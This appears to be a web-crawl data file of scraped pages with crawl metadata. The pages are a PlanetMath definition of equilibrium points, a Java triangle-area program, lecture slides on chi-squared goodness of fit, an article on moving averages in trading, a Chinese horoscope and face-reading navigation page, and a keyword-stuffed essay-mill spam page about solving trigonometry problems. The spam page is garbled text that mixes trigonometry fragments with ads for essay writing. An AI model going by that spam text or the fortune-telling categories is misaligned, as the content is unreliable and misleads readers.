{"ft_lang_label":"__label__en","ft_lang_prob":0.89687455,"math_prob":0.99521375,"size":447,"snap":"2022-27-2022-33","text_gpt3_token_len":137,"char_repetition_ratio":0.1738149,"word_repetition_ratio":0.0,"special_character_ratio":0.35794184,"punctuation_ratio":0.06818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9914474,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T16:34:14Z\",\"WARC-Record-ID\":\"<urn:uuid:1c4253c9-ae6e-4c2d-b37e-2a725990e52a>\",\"Content-Length\":\"5749\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c5c99bbf-aef2-4ce5-a598-343846d5f72a>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ca702ee-249e-4a47-8e1e-4154f68a7127>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/percent-of/13-3500\",\"WARC-Payload-Digest\":\"sha1:7E3ZWVK7FKXB5XDYTTFYJB75RTGQNRHQ\",\"WARC-Block-Digest\":\"sha1:6VC6UXLZNI2QRJGVWG4NCXVXRBW4EWMT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104585887.84_warc_CC-MAIN-20220705144321-20220705174321-00346.warc.gz\"}"}
https://planetmath.org/equilibriumpoint
[ "# equilibrium point\n\nConsider an autonomous differential equation\n\n $\\dot{x}=f(x).$ (1)\n\nAn equilibrium point $x_{0}$ of (1) is such that $f(x_{0})=0$. Conversely a regular point of (1) is such that $f(x_{0})\\neq 0$.\n\nIf the linearization $Df(x_{0})$ has no eigenvalue with zero real part, $x_{0}$ is said to be a hyperbolic equilibrium, whereas if there exists an eigenvalue with zero real part, the equilibrium point is nonhyperbolic.\n\nAn equilibrium point $x_{0}$ is said to be stable if for every neighborhood $x_{0}$,$U$ there exists a neighborhood of $x_{0}$, $U^{\\prime}\\subset U$ such that every solution of (1) with initial condition", null, "", null, "in $U^{\\prime}$ (i.e. $x(0)\\in U^{\\prime}$), satisfies\n\n $x(t)\\in U$\n\nfor all $t\\geq 0$.\n\nConsequently an equilibrium point $x_{0}$ is said to be unstable if it is not stable.\n\nMoreover an equilibrium point $x_{0}$ is said to be asymptotically stable if it is stable and there exists $U^{\\prime\\prime}$ such that every solution of (1) with initial condition in $U^{\\prime\\prime}$ (i.e. $x(0)\\in U^{\\prime\\prime}$) satisfies\n\n $\\lim_{t\\to\\infty}x(t)=x_{0}.$\n Title equilibrium point Canonical name EquilibriumPoint Date of creation 2013-03-22 13:18:34 Last modified on 2013-03-22 13:18:34 Owner Daume (40) Last modified by Daume (40) Numerical id 10 Author Daume (40) Entry type Definition Classification msc 34C99 Synonym steady state solution Synonym fixed point", null, "", null, "", null, "Synonym singular point Defines hyperbolic equilibrium Defines nonhyperbolic equilibrium Defines stable Defines unstable Defines asymptotically stable" ]
[ null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77817893,"math_prob":0.9997185,"size":1293,"snap":"2019-35-2019-39","text_gpt3_token_len":326,"char_repetition_ratio":0.15515904,"word_repetition_ratio":0.15544042,"special_character_ratio":0.24825986,"punctuation_ratio":0.08675799,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997428,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-23T17:27:35Z\",\"WARC-Record-ID\":\"<urn:uuid:7553aa6f-4999-442f-85e8-cfe603d1db5c>\",\"Content-Length\":\"14094\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:35cb3aec-6a5f-417f-8f41-c31429f792eb>\",\"WARC-Concurrent-To\":\"<urn:uuid:32158b82-597b-46a6-bf49-912edd63756f>\",\"WARC-IP-Address\":\"129.97.206.129\",\"WARC-Target-URI\":\"https://planetmath.org/equilibriumpoint\",\"WARC-Payload-Digest\":\"sha1:VAP6WCSZUSKMPCHXAEHH2ZMAYQTIWDRC\",\"WARC-Block-Digest\":\"sha1:H4HKHQAO7EAXC57OFRHO5X3ZZEX4ST3Y\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514577478.95_warc_CC-MAIN-20190923172009-20190923194009-00133.warc.gz\"}"}
https://customessaycheap.com/2021/03/11/solving-trig-problems_zt/
[ "# Solving trig problems\n\nHard; solving problems: this site uses a 5 step process to solve philosophy paper thesis trigonomtery problems:. 5.8 – research paper online free solving 3d problems by using trigonometry 3d problems involving example of short research paper triangles can be how to cite an essay in text solved using some combination of: to transform a trig accredited online degrees creative writing inequality into basic ones, students solving trig problems can use common algebraic. multiple choice 1. how. solving trig equations use both the reference angles and trigonometric identities that honor society essay you've memorized, together with a lot of the algebra you've learned. we solve `sin 2θ = 0.8` for 0 ≤ 2θ < 4π. home. the key solving trig problems is road rage essay that when we work on these problems, research proposal on cancer i emphasize the idea sat essay question of modeling joinery business plan (mp4).every time we read a problem in words, we're going to sketch a diagram of what it represents view trig problem no.7 solutions.png from math ma123 at seaman high. solving these problems will help solving trig problems the student to acquire pro­fessional skill necessary for a teacher who must know how to solve mathematical problems of the high-school level." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91823053,"math_prob":0.93455815,"size":1268,"snap":"2021-04-2021-17","text_gpt3_token_len":266,"char_repetition_ratio":0.15427215,"word_repetition_ratio":0.0,"special_character_ratio":0.20347004,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9524617,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-18T10:48:00Z\",\"WARC-Record-ID\":\"<urn:uuid:83528597-929f-4b26-9180-a6b54765493d>\",\"Content-Length\":\"19316\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bcd5ce9b-41e8-4aee-a0f8-b473fdca533c>\",\"WARC-Concurrent-To\":\"<urn:uuid:84d429ab-43dc-4b5f-bf36-6c929ca45acd>\",\"WARC-IP-Address\":\"37.252.9.207\",\"WARC-Target-URI\":\"https://customessaycheap.com/2021/03/11/solving-trig-problems_zt/\",\"WARC-Payload-Digest\":\"sha1:45A3RWUX6FZVZ5OVG3NFP6B5ICRK6LC7\",\"WARC-Block-Digest\":\"sha1:VXDYBRXEFNWGXILCYVOFZJWQYT6FPFUP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038476606.60_warc_CC-MAIN-20210418103545-20210418133545-00030.warc.gz\"}"}
http://suansuangua.com/c-29.html
[ "", null, "3日21日-4月20日\n2000年\n1月\n1日\n\n属鼠的人性格\n• 属鼠的人性格\n• 属牛的人性格\n• 属虎的人性格\n• 属兔的人性格\n• 属龙的人性格\n• 属蛇的人性格\n• 属马的人性格\n• 属羊的人性格\n• 属猴的人性格\n• 属鸡的人性格\n• 属狗的人性格\n• 属猪的人性格\n属鼠女\n• 属鼠女\n• 属牛女\n• 属虎女\n• 属兔女\n• 属龙女\n• 属蛇女\n• 属马女\n• 属羊女\n• 属猴女\n• 属鸡女\n• 属狗女\n• 属猪女\n属鼠男\n• 属鼠男\n• 属牛男\n• 属虎男\n• 属兔男\n• 属龙男\n• 属蛇男\n• 属马男\n• 属羊男\n• 属猴男\n• 属鸡男\n• 属狗男\n• 属猪男\nA型血\n• A型血\n• B型血\n• AB型血\n• O型血\n• 熊猫型血\nA型血女\n• A型血女\n• B型血女\n• AB型血女\n• O型血女\n• 熊猫型血女\nA型血男\n• A型血男\n• B型血男\n• AB型血男\n• O型血男\n• 熊猫型血男\n由字脸型\n• 由字脸型\n• 甲字脸型\n• 申字脸型\n• 田字脸型\n• 同字脸型\n• 王字脸型\n• 圆字脸型\n• 目字脸型\n• 用字脸型\n• 风字脸型\n• 国字脸\n• 长型脸\n• 扁型脸\n• 梯型脸\n• 菱型脸\n• 倒三角脸型\n• 瓜子脸\n• 三角型脸\n• 圆型脸\n眉毛有痣\n• 眉毛有痣\n• 眼角有痣\n• 下巴有痣\n• 肩膀有痣\n• 耳朵有痣\n• 鼻子有痣\n• 手心有痣\n• 脚底有痣\n• 胸口有痣\n• 嘴角有痣\n• 脖子有痣\n婚姻线\n• 婚姻线\n• 事业线\n• 智慧线\n• 生命线\n• 财运线\n• 成功线\n• 上进线\n• 障碍线\n• 健康线\n• 影响线\n• 活力线\n• 烦恼线\n• 纵欲线\n• 宠爱线\n• 创作线\n• 希望线\n• 努力线\n• 不测线\n• 人缘线" ]
[ null, "http://suansuangua.com/html/statics/pcdishen/images/xz/icon1.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9827744,"math_prob":0.5057154,"size":1858,"snap":"2019-43-2019-47","text_gpt3_token_len":2163,"char_repetition_ratio":0.06472492,"word_repetition_ratio":0.0,"special_character_ratio":0.22658773,"punctuation_ratio":0.23076923,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98050576,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T14:13:59Z\",\"WARC-Record-ID\":\"<urn:uuid:e5249f7f-f139-40e5-81eb-5d03a0ccc49e>\",\"Content-Length\":\"51366\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:413ccdb3-7a43-4585-a7e9-1838d508a531>\",\"WARC-Concurrent-To\":\"<urn:uuid:e5a1d111-4860-44bd-a91e-f71b0ffbeec7>\",\"WARC-IP-Address\":\"42.51.205.25\",\"WARC-Target-URI\":\"http://suansuangua.com/c-29.html\",\"WARC-Payload-Digest\":\"sha1:KPX2XFNNJAVME2Q5X3QXTIQFLTB6O23W\",\"WARC-Block-Digest\":\"sha1:ZRIJSERRI5A54WC3Z6IQIKJPXYRQEKVP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496667262.54_warc_CC-MAIN-20191113140725-20191113164725-00272.warc.gz\"}"}
https://www.hubberspot.com/2012/05/how-to-calculate-area-of-triangle.html
[ "## Free Data Structures and Algorithms Course\n\n### How to calculate Area of Triangle through a Java program ?.\n\nProgram to calculate Area of Triangle in Java\n\n```import java.util.Scanner;\n\npublic class Triangle {\n\npublic static void main(String[] args) {\nScanner input = new Scanner(System.in);\n\ndouble base = 0;\ndouble height = 0;\ndouble area = 0;\n\nSystem.out.print(\"Enter the length of base of triangle : \");\nbase = input.nextDouble();\n\nSystem.out.print(\"Enter the length of height of triangle : \");\nheight = input.nextDouble();\n\narea = (base * height) / 2;\n\nSystem.out.println(\"\");\nSystem.out.println(\"The Area of Triangle is : \"\n+ area);\n\n}\n\n}\n\n```\n\nOutput of the program :\n\n© 2021 Learn Java by Examples Template by Hubberspot" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.587589,"math_prob":0.92579246,"size":570,"snap":"2022-27-2022-33","text_gpt3_token_len":130,"char_repetition_ratio":0.14134276,"word_repetition_ratio":0.023255814,"special_character_ratio":0.28947368,"punctuation_ratio":0.25862068,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9922015,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-02T02:04:35Z\",\"WARC-Record-ID\":\"<urn:uuid:4946696c-fca7-49a3-bf5a-0ec7938229a5>\",\"Content-Length\":\"98335\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c94d1fc-1d75-4164-8e06-e62d611131f5>\",\"WARC-Concurrent-To\":\"<urn:uuid:1e1cca06-6260-4e3a-b040-40959f9ab5d6>\",\"WARC-IP-Address\":\"142.251.16.121\",\"WARC-Target-URI\":\"https://www.hubberspot.com/2012/05/how-to-calculate-area-of-triangle.html\",\"WARC-Payload-Digest\":\"sha1:M7XMF3KLRZQ5AGLDBCB6LT4IAFGFSLYT\",\"WARC-Block-Digest\":\"sha1:JYDYI3WGMH7L6YIXEZJUJBLO6BBMDWY7\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103983398.56_warc_CC-MAIN-20220702010252-20220702040252-00210.warc.gz\"}"}
https://scholar.archive.org/work/l6v6euiswbflzfg72k73t3veki
[ "### Construction of Conservation Laws Using Symmetries [chapter]\n\nNail H. Ibragimov\n2014 Similarity and Symmetry Methods\nThe concept of nonlinear self-adjointness of differential equations, introduced by the author in 2010, is discussed in detail. All linear equations and systems are nonlinearly self-adjoint. Moreover, the class of nonlinearly self-adjoint equations includes all nonlinear equations and systems having at least one local conservation law. It follows, in particular, that the integrable systems possessing infinite set of Lie-Bäcklund symmetries (higher-order tangent transformations) are nonlinearly\nmore » ... lf-adjoint. An explicit formula for conserved vectors associated with symmetries is provided for all nonlinearly self-adjoint differential equations and systems. The number of equations contained in the systems under consideration can be different from the number of dependent variables. A utilization of conservation laws for constructing exact solutions is discussed and illustrated by computing noninvariant solutions of the Chaplygin equations in gas dynamics." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88118476,"math_prob":0.95574564,"size":859,"snap":"2022-40-2023-06","text_gpt3_token_len":205,"char_repetition_ratio":0.1251462,"word_repetition_ratio":0.0,"special_character_ratio":0.21187428,"punctuation_ratio":0.10489511,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99208945,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T05:26:59Z\",\"WARC-Record-ID\":\"<urn:uuid:040dc523-afa3-4946-b2a8-dc1626fa87d4>\",\"Content-Length\":\"16540\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:044ef228-8ad8-4e82-8818-d7ae9f6b9e83>\",\"WARC-Concurrent-To\":\"<urn:uuid:b5bb421f-87ef-4329-9590-bbf92f4a1146>\",\"WARC-IP-Address\":\"207.241.225.9\",\"WARC-Target-URI\":\"https://scholar.archive.org/work/l6v6euiswbflzfg72k73t3veki\",\"WARC-Payload-Digest\":\"sha1:AEZ2NR3VHBCKA24KG2N2LWB5WSE7UZ35\",\"WARC-Block-Digest\":\"sha1:2E3L4VK3JECVUIUGNW56LUCLVOP4KVQX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499470.19_warc_CC-MAIN-20230128023233-20230128053233-00785.warc.gz\"}"}
https://fr.slideserve.com/lixue/2-and-goodness-of-fit
[ "", null, "Download", null, "Download Presentation", null, "χ 2 and Goodness of Fit\n\n# χ 2 and Goodness of Fit\n\nTélécharger la présentation", null, "## χ 2 and Goodness of Fit\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -\n##### Presentation Transcript\n\n1. χ2 and Goodness of Fit Louis Lyons Oxford SLUO Lecture 3, February 2007\n\n2. Least squares best fit Resume of straight line Correlated errors Errors in x and in y Goodness of fit with χ2 Errors of first and second kind Kinematic fitting Toy example THE paradox\n\n3. Straight Line Fit N.B. L.S.B.F. passes through (<x>, <y>)\n\n4. Error on intercept and gradient That is why track parameters specified at track ‘centre’\n\n5. See Lecture 1 b y a x\n\n6. If no errors specified on yi (!)\n\n7. Summary of straight line fitting • Plot data Bad points Estimate a and b (and errors) • a and b from formula • Errors on a’ and b • Cf calculated values with estimated • Determine Smin (using a and b) • ν = n – p • Look up in χ2 tables • If probability too small, IGNORE RESULTS • If probability a “bit” small, scale errors? Asymptotically\n\n8. Measurements with correlated errorse.g. systematics?\n\n9. STRAIGHT LINE: Errors on x and on y\n\n10. Comments on Least Squares method 1) Need to bin Beware of too few events/bin 2) Extends to n dimensions  but needs lots of events for n larger than 2 or 3 3) No problem with correlated errors 4) Can calculate Smin “on line” i.e. single pass through data Σ (yi – a –bxi)2 /σ2 = [yi2] – b [xiyi] –a [yi] 5) For theory linear in params, analytic solution y 6) Hypothesis testing x\n\n11. ‘Goodness of Fit’ by parameter testing?1+(b/a) cos2θ Is b/a = 0 ? ‘Distribution testing’ is better\n\n12. Goodness of Fit: χ2test • Construct S and minimise wrt free parameters • Determine ν = no. of degrees of freedom ν = n – p n = no. of data points p = no. of FREE parameters 3) Look up probability that,forν degrees of freedom, χ2 ≥ Smin Works ASYMPTOTICALLY, otherwise use MC [Assumes yi are GAUSSIAN distributed with mean yith and variance σi2]\n\n13. χ2 with ν degrees of freedom? ν = data – free parameters ? Why asymptotic (apart from Poisson  Gaussian) ? a) Fit flatish histogram with y = N {1 + 10-6 cos(x-x0)} x0 = free param b) Neutrino oscillations: almost degenerate parameters y ~ 1 – A sin2(1.27 Δm2 L/E) 2 parameters 1 – A (1.27 Δm2 L/E)2 1 parameter Small Δm2\n\n14. Goodness of Fit: Kolmogorov-Smirnov Compares data and model cumulative plots Uses largest discrepancy between dists. Model can be analytic or MC sample Uses individual data points Not so sensitive to deviations in tails (so variants of K-S exist) Not readily extendible to more dimensions Distribution-free conversion to p; depends on n (but not when free parameters involved – needs MC)\n\n15. Goodness of fit: ‘Energy’ test • Assign +ve charge to data ; -ve charge to M.C. • Calculate ‘electrostatic energy E’ of charges • If distributions agree, E ~ 0 • If distributions don’t overlap, E is positive v2 • Assess significance of magnitude of E by MC • N.B. v1 • Works in many dimensions • Needs metric for each variable (make variances similar?) • E ~ Σ qiqj f(Δr = |ri – rj|) , f = 1/(Δr + ε) or –ln(Δr + ε) • Performance insensitive to choice of small ε • See Aslan and Zech’s paper at: http://www.ippp.dur.ac.uk/Workshops/02/statistics/program.shtml\n\n16. 
Wrong Decisions Error of First Kind Reject H0 when true Should happen x% of tests Errors of Second Kind Accept H0 when something else is true Frequency depends on ……… i) How similar other hypotheses are e.g. H0 = μ Alternatives are: e π K p ii) Relative frequencies: 10-4 10-4 1 0.1 0.1 Aim for maximum efficiency Low error of 1st kind maximum purity Low error of 2nd kind As χ2 cut tightens, efficiency and purity Choose compromise\n\n17. How serious are errors of 1st and 2nd kind? • Result of experiment e.g Is spin of resonance = 2? Get answer WRONG Where to set cut? Small cut Reject when correct Large cut Never reject anything Depends on nature of H0 e.g. Does answer agree with previous expt? Is expt consistent with special relativity? 2) Class selector e.g. b-quark / galaxy type / γ-induced cosmic shower Error of 1st kind: Loss of efficiency Error of 2nd kind: More background Usually easier to allow for 1st than for 2nd 3) Track finding\n\n18. Goodness of Fit: = Pattern Recognition = Find hits that belong to track Parameter Determination = Estimate track parameters (and error matrix)\n\n19. Kinematic Fitting: Why do it?\n\n20. Kinematic Fitting: Why do it?\n\n21. Toy example of Kinematic Fit\n\n22. PARADOX Histogram with 100 bins Fit with 1 parameter Smin: χ2 with NDF = 99 (Expected χ2 = 99 ± 14) For our data, Smin(p0) = 90 Is p1 acceptable if S(p1) = 115? YES. Very acceptable χ2 probability NO. σp from S(p0 +σp) = Smin +1 = 91 But S(p1) – S(p0) = 25 So p1 is 5σ away from best value\n\n23. Next time : Discovery and p-values Hope: LHC moves us from era of ‘Upper Limits’ to that of DISCOVERY" ]
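The "look up in χ² tables" step on slide 12, and the numbers in the paradox on slide 22, can be reproduced with scipy. A sketch of mine, not part of the lecture:

```python
from scipy import stats

nu = 99                          # degrees of freedom: 100 bins - 1 parameter

# Goodness of fit: probability that chi2 with nu d.o.f. exceeds Smin
print(stats.chi2.sf(90, nu))     # ~0.73 -> very acceptable
print(stats.chi2.sf(115, nu))    # ~0.13 -> a "bit" small, still acceptable

# Parameter testing: the error comes from S(p0 + sigma) = Smin + 1,
# so Delta S = 115 - 90 = 25 puts p1 sqrt(25) = 5 sigma from the best value.
print((115 - 90) ** 0.5)         # 5.0
```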
[ null, "https://fr.slideserve.com/img/player/ss_download.png", null, "https://fr.slideserve.com/img/replay.png", null, "https://thumbs.slideserve.com/1_333894.jpg", null, "https://fr.slideserve.com/img/output_cBjjdt.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7390832,"math_prob":0.9614044,"size":4332,"snap":"2023-14-2023-23","text_gpt3_token_len":1211,"char_repetition_ratio":0.097042516,"word_repetition_ratio":0.0025188916,"special_character_ratio":0.27262235,"punctuation_ratio":0.088681445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9801718,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-09T21:26:49Z\",\"WARC-Record-ID\":\"<urn:uuid:adbc5667-40ce-4aa0-89e4-264c5d189c29>\",\"Content-Length\":\"95983\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5ef10922-7b5e-415d-885d-b52271d48982>\",\"WARC-Concurrent-To\":\"<urn:uuid:23bf527e-a952-4304-8435-f73a640a2e65>\",\"WARC-IP-Address\":\"44.242.49.119\",\"WARC-Target-URI\":\"https://fr.slideserve.com/lixue/2-and-goodness-of-fit\",\"WARC-Payload-Digest\":\"sha1:MFBRFUXNP3WEQZPY55HNCMGXOJCVFMJ5\",\"WARC-Block-Digest\":\"sha1:GN3K3XWJAAKPO2QPC2HSKXLQXCDIRFVQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224656833.99_warc_CC-MAIN-20230609201549-20230609231549-00723.warc.gz\"}"}
https://technicalindicators.net/indicators-technical-analysis/83-moving-averages-simple-exponential-weighted
[ "# Moving Averages\n\nPosted in Indicators of technical analysis\n\nMoving Average is a very popular indicator of technical analysis. It is broadly used because of its simplicity and possibility to combine several moving averages together. The basis is to select \"n\" - number of days during which the  prices will be averaged. The next step differs according to the type of moving average we want to calculate. There are 3 basic types of moving averages - Simple moving average, Exponential moving average and Weighted moving average.\n\n## SMA - Simple Moving Average\n\nSimple moving average formula:\n\n(Price n + Price n-1 – ...Price n-x) / x+1\n\nx+1 = number of days during which the moving average will be calculated. It is identical to the number of prices taken into consideration in the SMA construction.\n\nExample: If today's price is 11 \\$, yesterday's 10 \\$ and the day before yesterday 10 \\$ as well,  then a 3-day Simple moving average is calculated as follows: (11+10+10)/3, i.e. 10.33. Today's price is 11 \\$, 3-day moving average 10.33, so we can see immediately that the price became to rise, because it's above its moving average.\n\nSimple moving average gives all the days, implied to the calculation, the same importance. It is the main disadvantage of Simple moving average. If the farthest day implied to the calculation is extremely High or Low, the moving average can change rapidly tomorrow. In other words, if the Simple moving average changes rapidly, it doesn't have to mean there was a steep increase/decrease in the price currently. It can also mean that the farthest day implied has just fall out of the calculation. It happens in case if the value was extremelly High or Low and suddenly it's not in the average implied.\n\nThis unpleasant limitation is solved by Exponential moving average.\n\n## EMA - Exponential Moving Average\n\nExponential moving average, unlike the Simple moving average, gives higher priority to the actual data. The current values get higher importance in the EMA calculation compared to the furthest ones.\n\nEMA formula looks like follows:\n\nCalculate the parameter \"x\" (a.k.a. Alpha or SC - smoothing constant):\n\nx = 2/(n + 1)\n\nn – chosen time period for the EMA calculation.\n\nExample: If we calculate a 3-day's EMA, then x = 2/(3+1), i.e. 0.5.\n\nEMA = (Ema n-1) + [x * (Price n – Ema n-1)]\n\nEma n-1 = EMA value of the previous day\n\nPrice n = Actual Price (Today's price)\n\nExample: Should a 3-day EMA be 10 \\$ yesterday and today's price 11 \\$, then the calculation looks like follows: 10 + [0.5*(11–10)], what equals to 10.5. So the price rised to 11 \\$ and EMA rised to 10.5 \\$ from the yesterday's 10 \\$.  As you can see from the example, there is higher importance given to the actual data.\n\n## WMA - Weighted Moving Average\n\nThe last frequently used moving average is a WMA - Weighted Moving Average. WMA gives every day, implied to the calculation, different weights.  It is usual to give higher importance to actual days and lower importance to the furthest days. But it is up to you and your decision which day should be more or less significant.\n\nWMA formula looks like follows:\n\n[[(Price n * x)] + [Price n-1 * (y)] + …[Price n-2 * (z)]] / (x+y+z)\n\nPrice n = Actual price\n\nPrice n-1 = Price of the previous day\n\nPrice n-2 = Price of the day before yesterday etc.\n\nx, y, z = importance given to every single day.\n\nExample: Today's price is 11 \\$, yesterday's 10 \\$ and the day before yesterday also 10 \\$. 
We need to calculate 3-days WMA. The highest importance is given to the most actual day. The further the other days are, the lower weight is given to them. Calculation looks like follows: [(11*3) + (10*2) + (10*1)] / 6 =  10.5. The result shows that when price rised to 11 \\$, WMA rised to 10.5 \\$ as well.\n\nIn the end: We could see how the Moving Average calculations differ from each other. By the same entry data we got these results: SMA = 10.33; EMA = 10.50; WMA = 10.50.\n\nEMA and WMA reached higher values, because they give higher significance to the actual data and follow better the prevailing conditions on the market.\n\nNote: There are also other types of Moving averages used in technical analysis, of course. They arn't so famous and their construction is usually so complicated that we shall describe them in separate articles. For now we just mention some of the others like KAMA, HMA, FRAMA, DEMA, Vidya, T3 etc.\n\nNow we will describe how to use the Moving averages for trading to make some profits.\n\n## How to use Moving Averages for trading\n\nMoving averages are often used as a trend indicator so it can give us some hints when to go Long or Short.  The main idea is quite simple - when Close price is above its moving average, we Buy, when it is bellow its moving average, we Sell.  We change our positions every time the Close price crosses its MA. Because the Price/MA crossings can be very frequent, we can follow just he Moving Average curve. If it is rising, we buy, cause there is an Uptrend on the market. If the Moving average is decreasing, we Sell, because there is a Downtrend prevailing.", null, "There is a Blue 10-days EMA, White 21-days EMA and a Violet curve for 42-days EMA displayed in the picture above.\n\nIt is important to realize that the shorter time period we use for Moving Average calculation, the closer the Moving Average moves to the Price graph. It means the more frequent the Price/Average crossings are and the more signals to trade are given. As they come very often, there is a lot of false signals that would lead to a loss trade (have a look at he blue curve). On the contrary, the longer time period for Moving average calculation we choose, the farther it is from the Price chart and the later we enter the trades. It means the signals are not so frequent but our profits are lower, too (have a look at the violet curve).\n\nThere is also another way how to use the Moving averages. Trader doesn't have to follow the Price/MA crossings. He can follow 2 Moving Average crossings, too (take a look at the White and Blue curve crossings. They would give us very nice and profitable signals). One of the EMA is shorter, the other one Longer - e.g. EMA3 and EMA21 combination.\n\nIn other words, if we choose to follow two EMA crossings, there is not so many signals and we don't have to change our positions so often. Close price can be bellow its MA already, but the shorter Moving average is still above the longer moving average so it keeps us in the trade. 2 Moving average crossings don't follow every small price swing, so they can be pretty robust. It is an advantage especially in case the trend remains longer and does not change very often. So we can get less false signals about trend reversals. It also means that if the trend really changes, we get the signal a bit later.\n\nMoving averages are pretty useful during well trending markets. They keep us in the trade and don't allow to exit earlier than the trend really changes. 
It is also true that trading with Moving averages requires quite a large amount of money. The drawdown can be pretty high, so we need some backup funds. This is because Moving averages produce many signals during a choppy market - i.e. when the market moves sideways. If there is no prevailing trend, the moving average crossings are quite frequent and a lot of losing trades are made.

If you are interested in a deeper study of this technical indicator and prefer ready-to-use solutions, this section may be of interest to you. There you can find all the available indicators in an Excel file for download.", null, "" ]
[ null, "https://technicalindicators.net/images/stories/moving_average_klzavy_priemer_no.jpg", null, "https://technicalindicators.net/images/copyright.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93370336,"math_prob":0.97414315,"size":7470,"snap":"2023-14-2023-23","text_gpt3_token_len":1749,"char_repetition_ratio":0.15912135,"word_repetition_ratio":0.020895522,"special_character_ratio":0.24056225,"punctuation_ratio":0.11258278,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9892568,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,7,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-01T23:03:36Z\",\"WARC-Record-ID\":\"<urn:uuid:13789c04-225a-4ab5-87cd-2d1dab068920>\",\"Content-Length\":\"26207\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:41d91f74-2ddf-4145-bf44-af95734d8499>\",\"WARC-Concurrent-To\":\"<urn:uuid:d864d9f2-41da-4fd6-a51a-9fd185512dcc>\",\"WARC-IP-Address\":\"95.168.206.199\",\"WARC-Target-URI\":\"https://technicalindicators.net/indicators-technical-analysis/83-moving-averages-simple-exponential-weighted\",\"WARC-Payload-Digest\":\"sha1:UD4WWIPML3EGTIIGKQO6TEEJMZZW33DX\",\"WARC-Block-Digest\":\"sha1:TC7JJ7T5M5LGFRG54TUJAWWEVD3YXY6C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296950363.89_warc_CC-MAIN-20230401221921-20230402011921-00217.warc.gz\"}"}
https://search.r-project.org/CRAN/refmans/bssm/html/ssm_sde.html
